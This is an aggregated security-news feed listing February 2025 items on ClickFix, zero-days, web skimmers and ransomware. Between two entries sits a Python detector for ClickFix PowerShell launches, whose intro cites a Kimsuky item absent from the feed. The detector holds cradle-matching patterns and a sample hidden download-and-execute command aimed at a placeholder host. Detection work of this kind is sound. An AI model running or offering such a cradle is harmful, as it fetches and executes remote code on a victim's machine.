Defending Against Living-off-the-Land Attacks: Anomaly Detection in Action
Discover how Darktrace detected and responded to cyberattacks using Living-off-the-Land (LOTL) tactics to exploit trusted services and tools on customer networks.
2025-02-11T20:31:47+00:00 https://darktrace.com/blog/defending-against-living-off-the-land-attacks-anomaly-detection-in-action www.secnews.physaphae.fr/article.php?IdArticle=8648119 False Tool,Threat None 3.0000000000000000

Mandiant - Mandiant security blog
Cybercrime: A Multifaceted National Security Threat
2025-02-11T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/ www.secnews.physaphae.fr/article.php?IdArticle=8648141 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 41,APT 38,APT 29,APT 43,APT 44 3.0000000000000000

IndustrialCyber - cyber risk firms for industrial
Samoa warns of APT40 hackers targeting organizations in Blue Pacific region, urges immediate action
The Government of Samoa issued an advisory detailing the activities of the cyber threat group APT40 and the...
2025-02-11T15:50:20+00:00 https://industrialcyber.co/ransomware/samoa-warns-of-apt40-hackers-targeting-organizations-in-blue-pacific-region-urges-immediate-action/ www.secnews.physaphae.fr/article.php?IdArticle=8648066 False Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)
Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks
Threat actors have been observed using the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing them to monitor the device's screen in real-time, control the keyboard and mouse, upload and download
2025-02-11T15:25:00+00:00 https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html www.secnews.physaphae.fr/article.php?IdArticle=8648013 False Threat None 3.0000000000000000

The State of Security - American magazine
VERT Threat Alert: February 2025 Patch Tuesday Analysis
Today's VERT Alert addresses Microsoft's February 2025 Security Updates. VERT is actively working on coverage for these vulnerabilities and expects to ship ASPL-1143 as soon as coverage is completed. In-The-Wild & Disclosed CVEs: CVE-2025-21391 - A vulnerability in Windows Storage could lead to elevation of privilege; however, it is important to note that this would not give complete access to the file system. Instead, it only allows attackers to delete files they wouldn't otherwise have permission to remove. Microsoft has reported this vulnerability as Exploitation Detected. CVE-2025-21418 - A...
2025-02-11T14:28:37+00:00 https://www.tripwire.com/state-of-security/vert-threat-alert-february-2025-patch-tuesday-analysis www.secnews.physaphae.fr/article.php?IdArticle=8648118 False Vulnerability,Threat None 3.0000000000000000

Bleeping Computer - American magazine
Fortinet warns of new zero-day exploited to hijack firewalls
Fortinet warned today that attackers are exploiting another authentication bypass zero-day bug in FortiOS and FortiProxy to hijack Fortinet firewalls and breach enterprise networks. [...]
2025-02-11T13:56:13+00:00 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-zero-day-exploited-to-hijack-firewalls/ www.secnews.physaphae.fr/article.php?IdArticle=8648107 False Vulnerability,Threat None 3.0000000000000000

Dragos - CTI Society
Dragos Industrial Ransomware Analysis: Q4 2024
In the fourth quarter (October to December) of 2024, the ransomware threat landscape presented an increasingly dynamic ecosystem, with multiple... The post Dragos Industrial Ransomware Analysis: Q4 2024 first appeared on Dragos.
2025-02-11T13:00:00+00:00 https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-2024/ www.secnews.physaphae.fr/article.php?IdArticle=8648046 False Ransomware,Threat,Industrial None 3.0000000000000000
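Both the Kimsuky PowerShell item and the ClickFix/NetSupport RAT item above describe the same host-side shape: a victim is talked into opening a PowerShell window (often elevated) and pasting a one-liner that fetches and runs a payload. The detection below is an added example, not code from either article or from any vendor; it scores process-creation records for that shape. The field names (Image, ParentImage, CommandLine, IntegrityLevel, ProcessId) mimic a flattened Sysmon Event ID 1 record and are an assumption, as are the weights and threshold; the sample events are constructed.

```python
"""Score process-creation telemetry for ClickFix-style PowerShell launches.

Added example, not code from any of the aggregated articles. Field names follow a
flattened Sysmon Event ID 1 record (an assumption; real EDR schemas differ).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parents that mean a human (or a paste into Run/Terminal) started the shell, not a script host.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download-and-execute cradles typically pasted by the victim.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl|certutil)\b",
    re.IGNORECASE,
)

# Flags that hide the window, skip profile/policy, or carry an encoded command.
EVASION_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})",
    re.IGNORECASE,
)

@dataclass
class Finding:
    process_id: int
    score: int
    reasons: List[str] = field(default_factory=list)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding when a PowerShell launch looks like a ClickFix paste, else None."""
    if _basename(event.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    finding = Finding(process_id=int(event["ProcessId"]), score=0)

    if parent in INTERACTIVE_PARENTS:            # weight 3: the strongest ClickFix signal
        finding.score += 3
        finding.reasons.append(f"launched from interactive parent {parent}")
    if event.get("IntegrityLevel", "").lower() == "high":   # weight 2: "run as administrator"
        finding.score += 2
        finding.reasons.append("running elevated (High integrity)")
    if DOWNLOAD_CRADLE.search(cmdline):          # weight 3
        finding.score += 3
        finding.reasons.append("download cradle in command line")
    if EVASION_FLAGS.search(cmdline):            # weight 1: common in legitimate automation too
        finding.score += 1
        finding.reasons.append("hidden/bypass/encoded flags")

    # A cradle plus flags from a service or task is routine admin noise; require corroboration
    # from an interactive parent or elevation before alerting (threshold is an assumption).
    return finding if finding.score >= 5 else None

def detect_clickfix(events) -> List[Finding]:
    """Run score_event over a sequence of process-creation records."""
    return [f for f in (score_event(e) for e in events) if f is not None]

# Constructed sample telemetry (not real logs). The first record has the ClickFix shape;
# the other two are routine developer and scheduled-task activity that must not alert.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "High",
     "CommandLine": 'powershell.exe -w hidden -nop -c "iex (irm http://fix.example.invalid/verify.ps1)"'},
    {"ProcessId": 5212, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "IntegrityLevel": "Medium",
     "CommandLine": r"powershell.exe -File .\build.ps1"},
    {"ProcessId": 6001, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "IntegrityLevel": "System",
     "CommandLine": 'powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri https://updates.example/x.zip -OutFile C:\\tmp\\x.zip"'},
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(f"PID {hit.process_id} score={hit.score}: " + "; ".join(hit.reasons))
```

Only the first record fires (score 9: interactive parent, elevated, cradle, evasion flags). The third record carries a cradle and -NoProfile but comes from svchost.exe at System integrity, which is what a scheduled task looks like, so it stays under the threshold; tune the weights against your own baseline before deploying.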
Cyble - CyberSecurity Firm
Cyber Security Agency of Singapore Alerts Users on Active Exploitation of Zero-Day Vulnerability in Apple Products
Overview: The Cyber Security Agency of Singapore (CSA) has recently issued a warning regarding the active exploitation of a zero-day vulnerability (CVE-2025-24200) in a range of Apple products. This critical vulnerability is being actively targeted, and Apple has released timely security updates to address the issue. If exploited, the vulnerability could allow attackers to bypass certain security features and gain unauthorized access to sensitive data through USB connections. The vulnerability, identified as CVE-2025-24200, affects various Apple devices, including iPhones and iPads. Specifically, the issue lies in USB Restricted Mode, a security feature designed to prevent unauthorized access to a device's data when it is locked. A successful attack could disable this mode, allowing an unauthenticated attacker to access the device's data via a USB connection, even if the device is locked. This flaw has been dubbed a "zero-day vulnerability," as it was discovered and actively exploited before a patch or security fix was made available. Apple has moved quickly to resolve the issue with new security updates released on February 10, 2025. Affected Apple Products
2025-02-11T12:46:32+00:00 https://cyble.com/blog/csa-alerts-users-of-cve-2025-24200/ www.secnews.physaphae.fr/article.php?IdArticle=8648036 False Vulnerability,Threat,Mobile None 4.0000000000000000

IndustrialCyber - cyber risk firms for industrial
Silobreaker, Health-ISAC partner; offer members free trial access to its threat intelligence platform
Silobreaker announced on Tuesday its partnership with Health Information Sharing and Analysis Center (Health-ISAC) as a Community Services...
2025-02-11T12:41:56+00:00 https://industrialcyber.co/news/silobreaker-health-isac-partner-offer-members-free-trial-access-to-its-threat-intelligence-platform/ www.secnews.physaphae.fr/article.php?IdArticle=8648043 False Threat None 3.0000000000000000
Cyble - CyberSecurity Firm
EFCC Witness Exposes Shocking Details of Cyber Terrorism and Internet Fraud Scheme
Overview: In a highly anticipated trial on February 7, 2025, Rowland Turaki, a former employee of the accused, Xiao Hong Will, a Chinese national, took the stand as the first prosecution witness in the ongoing case concerning alleged cyber terrorism and internet fraud. The trial, which is being heard at the Federal High Court in Ikoyi, Lagos, is centered on Xiao Hong Will and his company, Genting International Co. Limited, both facing serious charges related to cybercrimes, identity theft, and fraud. The witness, who was studying cybersecurity at the time, described in vivid detail how his employers instructed him to disguise himself as a woman to gain the trust of potential clients for fraudulent schemes. According to Turaki, he was employed by Genting International, a company allegedly linked to a network of cybercriminals engaged in elaborate internet fraud operations. The company is accused of using deceptive tactics, including employing Nigerian youths for identity theft and cyber-terrorism activities aimed at destabilizing Nigeria's constitutional structure.
The Arrest of Xiao Hong Will: Xiao Hong Will, arrested during the EFCC's "Eagle Flush Operation" in Lagos on December 19, 2024, is charged with a series of crimes under the Cybercrimes (Prohibition, Prevention, Etc.) Act, 2015 (As Amended, 2024). He and his company allegedly facilitated the exploitation of victims by using fraudulent identities and cryptocurrency schemes to gain financial advantage. The prosecution has charged Hong Will and Genting International with using Nigerian youths to create fake personas, potential
2025-02-11T11:23:25+00:00 https://cyble.com/blog/efcc-witness-details-cyber-terrorism/ www.secnews.physaphae.fr/article.php?IdArticle=8648026 False Threat,Legislation,Medical,Technical None 3.0000000000000000

Global Security Mag - French news site
Almond Threat Landscape: the cyber threat crosses a new threshold - Investigations
2025-02-11T11:07:51+00:00 https://www.globalsecuritymag.fr/threat-landscape-almond-la-menace-cyber-franchit-un-nouveau-cap.html www.secnews.physaphae.fr/article.php?IdArticle=8648014 False Threat None 3.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine
Apple Mitigates "Extremely Sophisticated" Zero-Day Exploit
Apple has patched a zero-day vulnerability being exploited in targeted attacks
2025-02-11T10:30:00+00:00 https://www.infosecurity-magazine.com/news/apple-update-extremely/ www.secnews.physaphae.fr/article.php?IdArticle=8648021 False Vulnerability,Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)
Apple Patches Actively Exploited iOS Zero-Day CVE-2025-24200 in Emergency Update
Apple on Monday released out-of-band security updates to address a security flaw in iOS and iPadOS that it said has been exploited in the wild. Assigned the CVE identifier CVE-2025-24200, the vulnerability has been described as an authorization issue that could make it possible for a malicious actor to disable USB Restricted Mode on a locked device as part of a cyber physical attack. This
2025-02-11T10:02:00+00:00 https://thehackernews.com/2025/02/apple-patches-actively-exploited-ios.html www.secnews.physaphae.fr/article.php?IdArticle=8647977 False Vulnerability,Threat None 3.0000000000000000

Dark Reading - Informationweek Branch
XE Group Shifts From Card Skimming to Supply Chain Attacks
The likely Vietnam-based threat actor has been using two zero-days in VeraCore's warehouse management software in some of its latest cyberattacks.
2025-02-10T21:58:30+00:00 https://www.darkreading.com/cyber-risk/xe-group-shifts-card-skimming-supply-chain-attacks www.secnews.physaphae.fr/article.php?IdArticle=8647943 False Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)
Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores
Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites. Website security company Sucuri said the code, while appearing to be a typical GTM and Google Analytics script used for website analytics and advertising purposes, contains an obfuscated backdoor capable of providing attackers with persistent
2025-02-10T20:46:00+00:00 https://thehackernews.com/2025/02/hackers-exploit-google-tag-manager-to.html www.secnews.physaphae.fr/article.php?IdArticle=8647894 False Malware,Threat None 3.0000000000000000

IndustrialCyber - cyber risk firms for industrial
Xona Systems, Nozomi Networks boost critical infrastructure security with access management, threat detection
Xona Systems, provider of secure access management solutions for critical infrastructure, announced on Monday the integration of the...
2025-02-10T19:41:42+00:00 https://industrialcyber.co/news/xona-systems-nozomi-networks-boost-critical-infrastructure-security-with-access-management-threat-detection/ www.secnews.physaphae.fr/article.php?IdArticle=8647918 False Threat None 2.0000000000000000

TechRepublic - Security News US
Australians Hit With One Cyber Attack Every Second in 2024
Australia saw a record surge in cyber attacks in 2024, with data breaches escalating. Experts warn of rising risks as hackers may exploit AI-driven tactics.
2025-02-10T17:33:44+00:00 https://www.techrepublic.com/article/australia-one-cyber-attack-every-second/ www.secnews.physaphae.fr/article.php?IdArticle=8647895 False Threat None 3.0000000000000000

DarkTrace - DarkTrace: AI-based detection
From Hype to Reality: How AI is Transforming Cybersecurity Practices
AI hype is everywhere, but not many vendors are getting specific. Darktrace's multi-layered AI combines various machine learning techniques for behavioral analytics, real-time threat detection, investigation, and autonomous response.
2025-02-10T16:06:31+00:00 https://darktrace.com/blog/how-ai-is-transforming-cybersecurity-practices www.secnews.physaphae.fr/article.php?IdArticle=8647876 False Threat None 3.0000000000000000

The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)
DragonRank Exploits IIS Servers with BadIIS Malware for SEO Fraud and Gambling Redirects
Threat actors have been observed targeting Internet Information Services (IIS) servers in Asia as part of a search engine optimization (SEO) manipulation campaign designed to install BadIIS malware. "It is likely that the campaign is financially motivated since redirecting users to illegal gambling websites shows that attackers deploy BadIIS for profit," Trend Micro researchers Ted Lee and
2025-02-10T15:14:00+00:00 https://thehackernews.com/2025/02/dragonrank-exploits-iis-servers-with.html www.secnews.physaphae.fr/article.php?IdArticle=8647834 False Malware,Threat,Prediction None 3.0000000000000000

Dark Reading - Informationweek Branch
Analyst Burnout Is an Advanced Persistent Threat
For too long, we've treated our analysts as mere cogs in a machine, expecting them to conform to the limitations of our tools and processes. It's time to revolutionize security operations.
2025-02-10T15:00:00+00:00 https://www.darkreading.com/cybersecurity-operations/analyst-burnout-is-advanced-persistent-threat www.secnews.physaphae.fr/article.php?IdArticle=8647914 False Tool,Threat None 3.0000000000000000

Checkpoint Research - Security hardware vendor
10th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 10th February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: Grubhub, the US-based online food ordering and delivery platform, suffered a data breach due to unauthorized access through a compromised third-party service provider's account. The incident exposed personal details of customers, drivers, […]
2025-02-10T13:53:25+00:00 https://research.checkpoint.com/2025/10th-february-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8647861 False Data Breach,Threat None 3.0000000000000000
ProofPoint - Cyber Firms
Emerging Threats Updates Improve Metadata, Including MITRE ATT&CK Tags
2025-02-10T13:21:52+00:00 https://www.proofpoint.com/us/blog/threat-insight/emerging-threats-updates-improve-metadata-including-mitre-attck-tags www.secnews.physaphae.fr/article.php?IdArticle=8647970 False Malware,Tool,Vulnerability,Threat None 2.0000000000000000

IndustrialCyber - cyber risk firms for industrial
DHS warns Chinese-made internet cameras pose espionage threat to US critical infrastructure
The U.S. Department of Homeland Security (DHS) has reportedly issued a bulletin warning that internet-connected cameras manufactured in...
2025-02-10T12:41:21+00:00 https://industrialcyber.co/cisa/dhs-warns-chinese-made-internet-cameras-pose-espionage-threat-to-us-critical-infrastructure/ www.secnews.physaphae.fr/article.php?IdArticle=8647848 False Threat None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)
XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells
Threat actors have been observed exploiting multiple security flaws in various software products, including Progress Telerik UI for ASP.NET AJAX and Advantive VeraCore, to drop reverse shells and web shells, and maintain persistent remote access to compromised systems. The zero-day exploitation of security flaws in VeraCore has been attributed to a threat actor known as XE Group, a cybercrime
2025-02-10T10:44:00+00:00 https://thehackernews.com/2025/02/xe-hacker-group-exploits-veracore-zero.html www.secnews.physaphae.fr/article.php?IdArticle=8647796 False Vulnerability,Threat None 3.0000000000000000

InfoSecurity Mag - InfoSecurity Magazine
Europol Warns Financial Sector of "Imminent" Quantum Threat
Europol has urged the financial sector to prioritize quantum-safe cryptography
2025-02-10T09:45:00+00:00 https://www.infosecurity-magazine.com/news/europol-warns-financial-sector/ www.secnews.physaphae.fr/article.php?IdArticle=8647817 False Threat None 3.0000000000000000

The State of Security - American magazine
"Quishing" - The Emerging Threat of Fake QR Codes
QR codes have revolutionized digital interactions, offering quick access to websites and services and adding a layer of security to many apps. These quick and seemingly innocent codes are everywhere; however, their widespread use has made them a prime target for scammers. The corruption of QR codes leaves everyone vulnerable. However, there are simple methods to protect against this threat. What Is "Quishing"? In quishing attacks, scammers use fake QR codes to redirect people to fraudulent websites when the code is scanned. This enables the criminal to download information and profiles from the...
2025-02-10T03:03:17+00:00 https://www.tripwire.com/state-of-security/quishing-emerging-threat-fake-qr-codes www.secnews.physaphae.fr/article.php?IdArticle=8647807 False Threat None 3.0000000000000000

The State of Security - American magazine
Key Takeaways from the NCSC Annual Review 2024
In early December 2024, the UK's National Cyber Security Centre (NCSC) released its eighth Annual Review. While the report's primary focus is to recap the NCSC's activities over the past year, it also offers invaluable insights into how the UK thinks about and plans to act on cybersecurity. In this article, we'll look at a few of its key takeaways. UK in "A Contest for Cyberspace": The overarching theme of the NCSC Annual Review 2024 is the enormous scale of the cyber threat to the UK and the government's increasingly serious attitude towards it. This is best exemplified in the foreword by the...
2025-02-10T03:03:16+00:00 https://www.tripwire.com/state-of-security/key-takeaways-ncsc-annual-review-2024 www.secnews.physaphae.fr/article.php?IdArticle=8647808 False Threat None 3.0000000000000000

ProofPoint - Cyber Firms
AI in Cybersecurity: the Good, the Bad and the Ugly
2025-02-10T01:58:04+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/ai-cybersecurity-revolutionizing-protection-strategies www.secnews.physaphae.fr/article.php?IdArticle=8648557 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud None 2.0000000000000000

Techworm - News
Critical Microsoft Outlook RCE Bug Actively Exploited In Attacks
Cybersecurity firm Check Point has discovered a critical remote code execution (RCE) vulnerability in Microsoft Outlook, which is currently being exploited in active cyberattacks, posing a significant threat to organizations worldwide. This has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to warn
CVE-2024-21413 (CVSS score 9.8). This flaw results from improper input validation, which can trigger code execution when opening emails with malicious links using a vulnerable Microsoft Outlook version. Successful exploitation of this vulnerability would allow a threat actor to bypass Office Protected View and open malicious files in editing mode rather than protected mode. It could also grant the threat actor elevated privileges, including the ability to read, write, and delete data. Microsoft addressed the CVE-2024-21413 vulnerability a year ago, cautioning that the Preview Pane could itself be an attack vector. As a result, simply viewing a malicious email within Outlook might be enough to trigger the exploit, making it exceptionally dangerous. According to Check Point, attackers exploit the vulnerability, dubbed Moniker Link, through a method that tricks Outlook into opening unsafe files. It allows threat actors to bypass Outlook's built-in protections for malicious links embedded in emails using the file:// protocol. The attackers can make Outlook treat malicious files as trusted resources by appending an exclamation mark followed by arbitrary text to a file URL. By inserting this exclamation mark immediately after the file extension in a URL pointing to an attacker-controlled server, along with some random text, they can deceive the system and execute malicious payloads. For example, an attacker might craft a link as shown below: CLICK ME. When a victim clicks on the link, Outlook retrieves the file from the attacker's server and opens it outside Protected View, giving the attacker code execution on the victim's system. The CVE-2024-21413 vulnerability affects multiple Microsoft Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019. In response to the active exploitation of this vulnerability, CISA has added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) Catalog. Under the November 2021 Binding Operational Directive (BOD) 22-01, federal agencies have until February 27, 2025, to patch their systems and protect their networks against potential threats. "These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise," the cybersecurity agency warned on Thursday. With active exploitation in the wild, CVE-2024-21413 presents a severe security risk to Outlook users. Hence, private organizations are advised to immediately apply patches and reinforce cybersecurity defenses to prevent potential breaches.
2025-02-08T14:43:36+00:00 https://www.techworm.net/2025/02/microsoft-outlook-rce-bug-exploited-attacks.html www.secnews.physaphae.fr/article.php?IdArticle=8647563 False Vulnerability,Threat None 3.0000000000000000
The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Microsoft Identifies 3,000+ Publicly Disclosed ASP.NET Machine Keys Vulnerable to Code Injection Microsoft is warning of an insecure practice wherein software developers are incorporating publicly disclosed ASP.NET machine keys from publicly accessible resources, thereby putting their applications in attackers\' path. The tech giant\'s threat intelligence team said it observed limited activity in December 2024 that involved an unknown threat actor using a publicly available, static ASP.NET]]> 2025-02-07T16:31:00+00:00 https://thehackernews.com/2025/02/microsoft-identifies-3000-publicly.html www.secnews.physaphae.fr/article.php?IdArticle=8647404 False Threat None 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Malicious AI Models on Hugging Face Exploit Novel Attack Technique The technique, called nullifAI, allows the models to bypass Hugging Face\'s protective measures against malicious AI models]]> 2025-02-07T14:00:00+00:00 https://www.infosecurity-magazine.com/news/malicious-ai-models-hugging-face/ www.secnews.physaphae.fr/article.php?IdArticle=8647428 False Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers Software vendor Trimble is warning that hackers are exploiting a Cityworks deserialization vulnerability to remotely execute commands on IIS servers and deploy Cobalt Strike beacons for initial network access. [...]]]> 2025-02-07T13:42:44+00:00 https://www.bleepingcomputer.com/news/security/hackers-exploit-cityworks-rce-bug-to-breach-microsoft-iis-servers/ www.secnews.physaphae.fr/article.php?IdArticle=8647472 False Vulnerability,Threat None 3.0000000000000000 Zataz - Magazine Francais de secu The ZATAZ alert protocol: 2025 version Cybersecurity is crucial in a connected world. 
The ZATAZ alert protocol evolves after 25 years to better counter threats, with real-time alerts....]]> 2025-02-07T13:35:46+00:00 https://www.zataz.com/le-protocole-dalerte-zataz-version-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8647424 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Open Graph Spoofing Toolkit: Old Exploitation Techniques Still in Use to Lure Social Media Users into Phishing Attacks The current digital landscape necessitates a deliberate approach to sharing content on social media in order to achieve significant user engagement and click-through rates. This is where the Open Graph Protocol (OGP) comes into play. Developed by Facebook, Open Graph allows web developers to control how their web pages appear when shared across various platforms. Developers use specific meta tags in a webpage\'s HTML to define essential elements such as the title, description, and image that accompany shared links. Attackers have long exploited the Open Graph Protocol for malicious activities. Recently, Cyble Research and Intelligence Labs (CRIL) also observed a threat actor on a Russian underground forum offering a toolkit dubbed \'OG Spoof\' for similar operations. The toolkit was designed for phishing campaigns, aiming to mislead users and artificially inflate click-through rates by exploiting flaws in the Open Graph protocol. Overview The importance of Open Graph (OG) tags cannot be overstated. The OG tags enhance the visibility of content, making it appealing to a broader base of potential viewers and more likely to garner views and clicks. Figure 1: OG tags used in the header Several content management systems (CMS), such as WordPress and Magento, come equipped with built-in functionalities or plugins that automatically generate these tags based on the post\'s content. This automation ensures that when links are shared, they are presented in an engaging manner while accurately previewing their content. 
The TA released the \'OG Spoof\' kit for sale in October 2024 at a staggering USD 2,500 price and claimed that it was initially designed for their own fraudulent operations. However, as they developed advanced methods, the toolk]]> 2025-02-07T12:57:51+00:00 https://cyble.com/blog/open-graph-spoofing-toolkit/ www.secnews.physaphae.fr/article.php?IdArticle=8647415 False Malware,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Critical Vulnerabilities Reported in Cyble\\'s Weekly Vulnerability Insights Overview Cyble Research & Intelligence Labs (CRIL) published their Weekly Vulnerability Insights Report to clients, covering key vulnerabilities reported from January 29 to February 4, 2025. The analysis highlights critical security flaws that have posed cyber threats to various IT infrastructures globally. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) added five vulnerabilities to the Known Exploited Vulnerability (KEV) catalog. This report highlights vulnerabilities in several widely used software products and services, including Paessler PRTG Network Monitor, Microsoft .NET Framework, and Zyxel DSL devices. These vulnerabilities could impact a range of industries that rely on these systems to monitor, manage, and protect critical infrastructure. Incorporation of Vulnerabilities into the KEV Catalog CISA\'s inclusion of vulnerabilities in the KEV catalog is an important step in highlighting serious risks associated with widely deployed software. During this period, CISA added five vulnerabilities, including two dating back to 2018, that have been actively exploited and affect major IT infrastructure tools like Paessler PRTG Network Monitor. These vulnerabilities were assessed for their active exploitation and listed accordingly to ensure better protection for organizations globally. 
Among the newly added vulnerabilities, CVE-2018-19410 and ]]> 2025-02-07T11:44:32+00:00 https://cyble.com/blog/cybles-weekly-vulnerability-kev-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8647402 False Tool,Vulnerability,Threat,Patching,Mobile None 3.0000000000000000 Cyble - CyberSecurity Firm U.S. Ransomware Attacks Surge to Start 2025 Overview According to an analysis of Cyble threat intelligence data, U.S. ransomware attacks have surged to the start of 2025, up nearly 150% from the first five weeks of 2024. Ransomware attacks on U.S. targets have been climbing since a few organizations paid ransoms to attackers in highly publicized cases last year, making the country a more attractive target for ransomware groups. That\'s likely the main reason for the increase. Regardless of the timeframe or changes in the most active ransomware groups, U.S. ransomware attacks have increased substantially in the last year and have been climbing steadily since the fall. We\'ll examine the changing ransomware landscape in the U.S. and other frequently attacked countries and consider what changes may be in store as we approach 2025. The Effect of Ransomware Payments In the first five weeks of 2024, Cyble documented 152 ransomware attacks on U.S. targets, in line with late 2023 trends. In the first five weeks of 2025, that number soared to 378 attacks on U.S. targets, a 149% year-over-year increase. Compared to the end of 2024, attacks are up a still significant 29% so far in 2025, up from 282 in the last five weeks of the year. Perhaps owing to geographical proximity, Canada has also seen a significant increase in ransomware attacks, up from 14 in the year-ago period to 28 at the end of 2024, and nearly doubling again to 46 to start 2025. Even as North American ransomware attacks have soared, the next-most attacked regions have stayed relatively stable. France, for example, had 18 attacks to start in 2024 and has seen 19 thus far in 2025 (chart below). 
]]> 2025-02-07T10:55:33+00:00 https://cyble.com/blog/u-s-ransomware-attacks-surge-to-start-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8647393 False Ransomware,Tool,Vulnerability,Threat,Legislation,Prediction,Medical None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware Threat actors have been observed exploiting recently disclosed security flaws in SimpleHelp\'s Remote Monitoring and Management (RMM) software as a precursor for what appears to be a ransomware attack. The intrusion leveraged the now-patched vulnerabilities to gain initial access and maintain persistent remote access to an unspecified target network, cybersecurity company Field Effect said in a]]> 2025-02-07T10:49:00+00:00 https://thehackernews.com/2025/02/hackers-exploit-simplehelp-rmm-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=8647359 False Ransomware,Vulnerability,Threat None 3.0000000000000000 SecurityWeek - Security News Trimble Cityworks Customers Warned of Zero-Day Exploitation Trimble Cityworks is affected by a zero-day vulnerability that has been exploited in attacks involving the delivery of malware.
2025-02-07T09:55:00+00:00 https://www.securityweek.com/trimble-cityworks-customers-warned-of-zero-day-exploitation/ www.secnews.physaphae.fr/article.php?IdArticle=8647385 False Malware,Vulnerability,Threat None 3.0000000000000000
AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC A Rose by Any Other Name: Exposure Management, a Category that Evolved from Traditional Vulnerability Management 2025-02-07T07:00:00+00:00 https://levelblue.com/blogs/security-essentials/rose-exposure-management-from-traditional-vulnerability-management www.secnews.physaphae.fr/article.php?IdArticle=8647365 False Tool,Vulnerability,Threat,Patching,Mobile,Industrial,Cloud,Technical None 3.0000000000000000 InformationSecurityBuzzNews - Site de News Securite The RAT Pack Returns: ValleyRAT\\'s Devious Delivery Methods Morphisec Threat Labs has uncovered cunning new delivery techniques used by ValleyRAT, a sophisticated multi-stage malware attributed to the Silver Fox APT.   The malware, which primarily targets key roles in finance, accounting, and sales, has evolved with updated tactics, techniques, and procedures (TTPs), including the reuse of URLs and the exploitation of gaming binaries for [...]]]> 2025-02-07T03:57:39+00:00 https://informationsecuritybuzz.com/valleyrats-devious-delivery-methods/ www.secnews.physaphae.fr/article.php?IdArticle=8647348 False Malware,Threat None 3.0000000000000000 Global Security Mag - Site de news francais Nationwide partners with CAPSLOCK Business News
Nationwide partners with CAPSLOCK to boost cyber skills, diversity and resilience CAPSLOCK\'s tailored programme upskills Nationwide\'s first cohort of learners to tackle both the challenging hiring and threat landscapes - Business News]]>
2025-02-06T22:23:43+00:00 https://www.globalsecuritymag.fr/nationwide-partners-with-capslock.html www.secnews.physaphae.fr/article.php?IdArticle=8647321 False Threat None 2.0000000000000000
Global Security Mag - Site de news francais CyberArk announced a new integration with SentinelOne Singularity Product Reviews
CyberArk and SentinelOne team up to enable step change in endpoint and identity security Mutual customers will benefit from boosted endpoint threat detection and response capabilities - Product Reviews]]>
